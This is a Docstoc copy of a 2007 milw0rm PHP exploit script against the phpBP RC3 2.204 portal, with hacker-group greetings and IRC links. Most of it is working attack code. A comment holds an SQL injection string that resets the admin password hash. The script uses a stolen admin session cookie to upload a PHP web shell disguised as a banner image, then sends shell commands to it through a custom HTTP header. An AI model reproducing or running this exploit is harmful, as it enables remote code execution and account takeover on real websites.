Docstoc

phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit

Document Sample
phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit Powered By Docstoc
					                                phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit     Page 1/5
  1    <?
  2    //**************************************************************
  3    //Kacper & str0ke Settings
  4    $exploit_name = "phpBP <= RC3 (2.204) (sql/cmd) Remote Code Execution Exploit";
  5    $script_name = "phpBP RC3 (2.204)";
  6    $script_site = "http://www.phpbp.com/";
  7    $dork = ’Silnik strony jest chroniony prawami autorskimi PHP BP Team’;
  8    //to work exploit you need admin session
  9    //**************************************************************
  10   print ’
  11   ::::::::: :::::::::: ::: ::: ::::::::::: :::
  12   :+: :+: :+:            :+: :+: :+: :+:
  13   +:+ +:+ +:+              +:+ +:+ +:+ +:+
  14   +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
  15   +#+ +#+ +#+                 +#+ +#+          +#+ +#+
  16   #+# #+# #+#                 #+#+#+#          #+# #+#
  17   ######### ########## ### ########### ##########
  18   ::::::::::: :::::::::: ::: :::: ::::
  19       :+: :+:             :+: :+: +:+:+: :+:+:+
  20       +:+ +:+              +:+ +:+ +:+ +:+:+ +:+
  21       +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
  22       +#+ +#+              +#+ +#+ +#+             +#+
  23       #+# #+#              #+# #+# #+#            #+#
  24       ### ########## ### ### ###                     ###
  25
  26     − − [DEVIL TEAM THE BEST POLISH TEAM] − −
  27
  28
  29   [Exploit name: ’.$exploit_name.’
  30   [Script name: ’.$script_name.’
  31   [Script site: ’.$script_site.’
  32   dork: ’.$dork.’
  33
  34   Find by: Kacper (a.k.a Rahim)
  35   Blog: http://kacper.bblog.pl/
  36
  37   DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam
  38   DEVIL TEAM HOME: http://www.rahim.webd.pl/
  39
  40   Contact: kacper1964@yahoo.pl
  41
  42   (c)od3d by Kacper
  43   −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  44   Greetings DragonHeart and all DEVIL TEAM Patriots :)
  45   − Leito & Leon | friend str0ke ;)
  46
  47   pepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)
  48   dn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,
  49   RebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB
  50
  51   and
  52

Kacper                                                                                   01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                                     Page 2/5
  53    Dr Max Virus
  54    TamTurk,
  55    hackersecurity.org
  56    and all exploit publishers
  57    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  58              Greetings for 4ll Fusi0n Group members ;−)
  59              and all members of hacker.com.pl ;)
  60    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  61
  62         Kacper Hacking & Security Blog: http://kacper.bblog.pl/
  63    ’;
  64    /*
  65    Exploit upload evil script when admin add new banner in portal.
  66
  67    i Find some errors in forum. Enter in comment forum:
  68


                                                           */
  69    //fajny’;UPDATE/**/‘22_users‘/**/SET/**/‘pass‘/**/=/**/’6a8f25e5b30777a0435c22fe36f45e3c’,‘buddies‘/**/=/**/NULL,‘for
        um_subscribed‘/**/=/**/NULL,‘forum_subscribed_clicked‘/**/=/**/NULL,‘forum_unsubscribe‘/**/=/**/NULL/**/WHERE/**/‘id‘
        /**/=/**/’1’/**/LIMIT/**/1;
  70    /*
  71    then you can insert SQL code :)
  72    */
  73    if ($argc<5) {
  74    print_r(’
  75    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  76    Usage: php ’.$argv[0].’ host path admin_session cmd OPTIONS
  77    host:    target server (ip/hostname)
  78    path:     phpBP Forum path
  79    admin_session: admin session id
  80    cmd:       a shell command (ls −la)
  81    Options:
  82     −p[port]: specify a port other than 80
  83     −P[ip:port]: specify a proxy
  84    Example:
  85    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la −P1.1.1.1:80
  86    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la
  87    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  88    ’);
  89    die;
  90    }
  91    error_reporting(0);
  92    ini_set("max_execution_time",0);
  93    ini_set("default_socket_timeout",5);
  94    function quick_dump($string)
  95    {
  96       $result=’’;$exa=’’;$cont=0;
  97       for ($i=0; $i<=strlen($string)−1; $i++)
  98       {
  99         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  100        {$result.=" .";}
Kacper                                                                                                              01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                     Page 3/5
  101        else
  102        {$result.=" ".$string[$i];}
  103        if (strlen(dechex(ord($string[$i])))==2)
  104        {$exa.=" ".dechex(ord($string[$i]));}
  105        else
  106        {$exa.=" 0".dechex(ord($string[$i]));}
  107        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  108      }
  109     return $exa."\r\n".$result;
  110   }
  111   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
  112   function sendpacket($packet)
  113   {
  114      global $proxy, $host, $port, $html, $proxy_regex;
  115      if ($proxy==’’) {
  116         $ock=fsockopen(gethostbyname($host),$port);
  117         if (!$ock) {
  118           echo ’No response from ’.$host.’:’.$port; die;
  119         }
  120      }
  121      else {
  122              $c = preg_match($proxy_regex,$proxy);
  123         if (!$c) {
  124           echo ’Not a valid proxy...’;die;
  125         }
  126         $parts=explode(’:’,$proxy);
  127         echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  128         $ock=fsockopen($parts[0],$parts[1]);
  129         if (!$ock) {
  130           echo ’No response from proxy...’;die;
  131              }
  132      }
  133      fputs($ock,$packet);
  134      if ($proxy==’’) {
  135         $html=’’;
  136         while (!feof($ock)) {
  137           $html.=fgets($ock);
  138         }
  139      }
  140      else {
  141         $html=’’;
  142         while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  143           $html.=fread($ock,1);
  144         }
  145      }
  146      fclose($ock);
  147   }
  148   function make_seed()
  149   {
  150       list($usec, $sec) = explode(’ ’, microtime());
  151       return (float) $sec + ((float) $usec * 100000);
  152   }
Kacper                                                                                             01/18/2007
                                phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                                                                         Page 4/5
  153   $host=$argv[1];
  154   $path=$argv[2];
  155   $adsess=$argv[3];
  156   $cmd="";
  157   $port=80;
  158   $proxy="";
  159   for ($i=4; $i<$argc; $i++){
  160   $temp=$argv[$i][0].$argv[$i][1];
  161   if (($temp<>"−p") and ($temp<>"−P")) {$cmd.=" ".$argv[$i];}
  162   if ($temp=="−p")
  163   {
  164      $port=str_replace("−p","",$argv[$i]);
  165   }
  166   if ($temp=="−P")
  167   {
  168      $proxy=str_replace("−P","",$argv[$i]);
  169   }
  170   }
  171   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  172   echo "Connected...\n";
  173   $data ="−−H4ck\r\n";
  174   $data.="Content−Disposition: form−data; name=\"url\";\r\n\r\n";
  175   $data.="http://kacper.bblog.pl/\r\n";
  176   $data ="−−H4ck\r\n";
  177   $data.="Content−Disposition: form−data; name=\"limit\";\r\n\r\n";
  178   $data.="0\r\n";
  179   $data ="−−H4ck\r\n";
  180   $data.="Content−Disposition: form−data; name=\"image\";\r\n\r\n";
  181   $data.="1\r\n";
  182   $data ="−−H4ck\r\n";
  183   $data.="Content−Disposition: form−data; name=\"form\";\r\n\r\n";
  184   $data.="1\r\n";
  185   $data ="−−H4ck\r\n";
  186   $data.="Content−Disposition: form−data; name=\"image_form\" filename=\"d.jpg.vil.gif.php\";\r\n\r\n";
  187   $data.="Content−Type: text/plain\r\n";
  188   $data.="Content−Transfer−Encoding: binary\r\n";
  189   $data.=’<?php ob_clean();//Ruchomy zamek Hauru ;−)echo"...Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM..the..best..polish..team..Greetz...";echo"...Go To DEVIL
        TEAM IRC: irc.milw0rm.com:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SER
        VER[HTTP_HAURU]);die;?>\r\n’;
  190   $data ="−−H4ck\r\n";
  191   $data.="Content−Disposition: form−data; name=\"image_http\";\r\n\r\n";
  192   $data.="http://\r\n";
  193   $data ="−−H4ck\r\n";
  194   $data.="Content−Disposition: form−data; name=\"swf\";\r\n\r\n";
  195   $data.="0\r\n";
  196   $data ="−−H4ck\r\n";
  197   $data.="Content−Disposition: form−data; name=\"alt\";\r\n\r\n";
  198   $data.="0\r\n";
  199   $data ="−−H4ck\r\n";
  200   $data.="Content−Disposition: form−data; name=\"submit\";\r\n\r\n";
  201   $data.="Add\r\n";
  202   $data.="−−H4ck−−\r\n";
Kacper                                                                                                                                                        01/18/2007
                           phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit             Page 5/5
  203   echo "wait now insert evil code...\n";
  204   $packet ="POST ".$p."index.php?module=admin&action=banners&cmd=add HTTP/1.0\r\n";
  205   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  206   $packet.="Content−Type: multipart/form−data; boundary=−−H4ck\r\n";
  207   $packet.="Host: ".$host."\r\n";
  208   $packet.="Content−Length: ".strlen($data)."\r\n";
  209   $packet.="Connection: Close\r\n\r\n";
  210   $packet.=$data;
  211   sendpacket($packet);
  212   $packet ="GET ".$p."index.php?module=admin&action=banners HTTP/1.0\r\n";
  213   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  214   $packet.="Host: ".$host."\r\n";
  215   $packet.="Connection: Close\r\n\r\n";
  216   sendpacket($packet);
  217   $temp=explode(’<TD CLASS="row_1" ALIGN="CENTER"><A HREF="upload/banners/’,$html);
  218   $temp2=explode(’.php" TARGET="_blank">’,$temp[1]);
  219   $uploadid=trim($temp2[0]);
  220   if ($uploadid) {echo "Step 1\n";
  221   echo "Upload id: ".$uploadid."\n";
  222   $packet ="GET ".$p."upload/banners/".$uploadid.".php HTTP/1.0\r\n";
  223   $packet.="HAURU: ".$cmd."\r\n";
  224   $packet.="Host: ".$host."\r\n";
  225   $packet.="Connection: Close\r\n\r\n";
  226   $packet.=$data;
  227   sendpacket($packet);
  228   sleep(1);
  229   }else {
  230   echo "exploit failed... can’t upload script :/\n";
  231   echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
  232   die("\n\nClose Connection");
  233   }
  234   if (strstr($html,"Hauru"))
  235   {
  236   $temp=explode("Hauru",$html);
  237   die($temp[1]);
  238   }
  239   ?>
  240
  241   # milw0rm.com [2007−01−18]




Kacper                                                                                      01/18/2007

				
DOCUMENT INFO